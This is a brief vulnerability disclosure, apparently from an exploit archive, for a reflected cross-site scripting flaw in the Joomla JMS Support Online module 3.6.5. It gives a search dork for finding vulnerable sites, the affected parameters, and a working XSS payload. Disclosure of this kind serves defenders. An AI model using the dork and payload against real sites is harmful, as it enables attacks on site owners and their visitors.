Joomla JMS Support Online Module 3.6.5 Cross Site Scripting

Posted on 22 February 2017

Exploit Title : Joomla JMS Support Online Module Reflected XSS - skype
extension
Google Dork : inurl:sendmessage.php?type=skype
Date : 12/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : https://www.joommasters.com
Version: 3.6.5
Type : webapps
Platform: Joomla

------------------------------------------------

Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/sendmessage.php
Vulnerable Parameters: ?type=skype&user=<vulnerable>&skype=<vulnerable>
Method: GET
Payload: "><img src=i onerror=prompt(2)>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Apache Solr Backup/Restore API Remote Code Execution
Nginx 1.25.5 Host Header Validation
Relate Learning And Teaching System SSTI / Remote Code Execution
Flowise 1.6.5 Authentication Bypass
WordPress Background Image Cropper 1.2 Shell Upload

Last 20